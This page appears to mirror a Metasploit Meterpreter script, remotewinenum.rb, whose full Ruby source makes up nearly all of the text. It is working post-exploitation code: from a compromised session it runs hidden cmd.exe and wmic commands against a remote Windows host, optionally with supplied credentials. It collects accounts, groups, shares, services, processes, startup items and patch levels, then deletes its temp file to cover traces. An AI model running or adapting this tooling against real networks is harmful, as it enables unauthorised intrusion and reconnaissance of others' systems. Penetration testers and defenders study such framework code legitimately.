CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/scripts/meterpreter/remotewinenum.rb
Views: 1904
1
##

2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.

3
# If you'd like to improve this script, please try to port it as a post

4
# module instead. Thank you.

5
##

6


7


8


9
# Author: Carlos Perez at carlos_perez[at]darkoperator.com

10
#-------------------------------------------------------------------------------

11
################## Variable Declarations ##################

12
session = client

13
# Variables for Options

14
helpcall = 0

15
rusr = nil

16
rpass = nil

17
trg = ""

18
# Script Options

19
@@exec_opts = Rex::Parser::Arguments.new(

20
  "-h"  => [ false,  "Help menu."],

21
  "-t"  => [ true,  "The target address"],

22
  "-u"  => [ true,  "User on the target system (If not provided it will use credential of process)"],

23
  "-p"  => [ true,  "Password of user on target system"]

24
)

25


26
# Create Filename info to be appended to downloaded files

27
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")

28


29
# Create a directory for the logs

30
logs = ::File.join(Msf::Config.log_directory, 'scripts', 'remotewinenum')

31


32
# Create the log directory

33
::FileUtils.mkdir_p(logs)

34


35
# WMIC Commands that will be executed on the Target

36
wmic = [

37
  'environment list',

38
  'share list',

39
  'nicconfig list',

40
  'computersystem list',

41
  'useraccount list',

42
  'group list',

43
  'sysaccount list',

44
  'volume list brief',

45
  'logicaldisk get description,filesystem,name,size',

46
  'netlogin get name,lastlogon,badpasswordcount',

47
  'netclient list brief',

48
  'netuse get name,username,connectiontype,localname',

49
  'share get name,path',

50
  'nteventlog get path,filename,writeable',

51
  'service list brief',

52
  'process list brief',

53
  'startup list full',

54
  'rdtoggle list',

55
  'product get name,version',

56
  'qfe list'

57
]

58
################## Function Declarations ##################

59


60
# Function for running a list of WMIC commands stored in a array, returns string

61
def wmicexec(session,wmic,user,pass,trgt)

62
  print_status("Running WMIC Commands ....")

63
  tmpout = ''

64
  command = nil

65
  runfail = 0

66
  runningas = session.sys.config.getuid

67
  begin

68
    tmp = session.sys.config.getenv('TEMP')

69
    # Temporary file on windows host to store results

70
    wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"

71


72
    wmic.each do |wmi|

73
      if user == nil

74
        print_status("The commands will be ran under the credentials of #{runningas}")

75
        command = "/node:#{trgt} /append:#{wmicfl} #{wmi}"

76
      else

77
        command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}"

78
      end

79
      print_status "\trunning command wimic #{wmi}"

80
      r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})

81
      sleep(1)

82
      r = session.sys.process.execute("cmd.exe /c echo      Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'})

83
      sleep(1)

84
      r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'})

85
      sleep(1)

86
      #print_status "\twmic #{command}"

87
      r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true})

88
      #Making sure that wmic finishes before executing next wmic command

89
      prog2check = "wmic.exe"

90
      found = 0

91
      sleep(2)

92
      while found == 0

93
        session.sys.process.get_processes().each do |x|

94
          found =1

95
          if prog2check == (x['name'].downcase)

96
            sleep(0.5)

97
            found = 0

98
          end

99
        end

100
      end

101
      r.close

102
    end

103
    # Read the output file of the wmic commands

104
    wmioutfile = session.fs.file.new(wmicfl, "rb")

105
    until wmioutfile.eof?

106
      tmpout << wmioutfile.read

107
    end

108
    # Close output file in host

109
    wmioutfile.close

110
  rescue ::Exception => e

111
    print_status("Error running WMIC commands: #{e.class} #{e}")

112
  end

113
  # We delete the file with the wmic command output.

114
  c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})

115
  c.close

116
  tmpout

117
end

118


119
#------------------------------------------------------------------------------

120
# Function to generate report header

121
def headerbuid(session,target,dest)

122
  # Header for File that will hold all the output of the commands

123
  info = session.sys.config.sysinfo

124
  header =  "Date:       #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n"

125
  header << "Running as: #{client.sys.config.getuid}\n"

126
  header << "From:       #{info['Computer']}\n"

127
  header << "OS:         #{info['OS']}\n"

128
  header << "Target:     #{target}\n"

129
  header << "\n\n\n"

130


131
  print_status("Saving report to #{dest}")

132
  header

133


134
end

135


136
#------------------------------------------------------------------------------

137
# Function Help Message

138
def helpmsg

139
  print("Remote Windows Enumeration Meterpreter Script\n" +

140
    "This script will enumerate windows hosts in the target environment\n" +

141
    "given a username and password or using the credential under witch\n" +

142
    "Meterpreter is running using WMI wmic windows native tool.\n" +

143
    "Usage:\n" +

144
    @@exec_opts.usage)

145
end

146
################## MAIN ##################

147
if client.platform == 'windows'

148
  localos = session.sys.config.sysinfo

149


150
  # Check that the command is not being ran on a Win2k host

151
  # since wmic is not present in Windows 2000

152
  if localos =~ /(Windows 2000)/

153
    print_status("This script is not supported to be ran from Windows 2000 servers!!!")

154
  else

155
    # Parsing of Options

156
    @@exec_opts.parse(args) { |opt, idx, val|

157
      case opt

158


159
      when "-t"

160
        trg = val

161
      when "-u"

162
        rusr = val

163
      when "-p"

164
        rpass = val

165
      when "-h"

166
        helpmsg

167
        helpcall = 1

168
      end

169


170
    }

171
    #logfile name

172
    dest = logs + "/" + trg + filenameinfo

173
    # Executing main logic of the script

174
    if helpcall == 0 and trg != ""

175


176
      # Making sure that is running as System a Username and Password for target machine must be provided

177


178
      if is_system? && rusr == nil && rpass == nil

179


180
        print_status("Stopped: Running as System and no user provided for connecting to target!!")

181


182
      else trg != nil && helpcall != 1

183


184
        file_local_write(dest,headerbuid(session,trg,dest))

185
        file_local_write(dest,wmicexec(session,wmic,rusr,rpass,trg))

186


187
      end

188
    elsif helpcall == 0 and trg == ""

189


190
      helpmsg

191
    end

192
  end

193
else

194
  print_error("This version of Meterpreter is not supported with this Script!")

195
  raise Rex::Script::Completed

196
end

197


198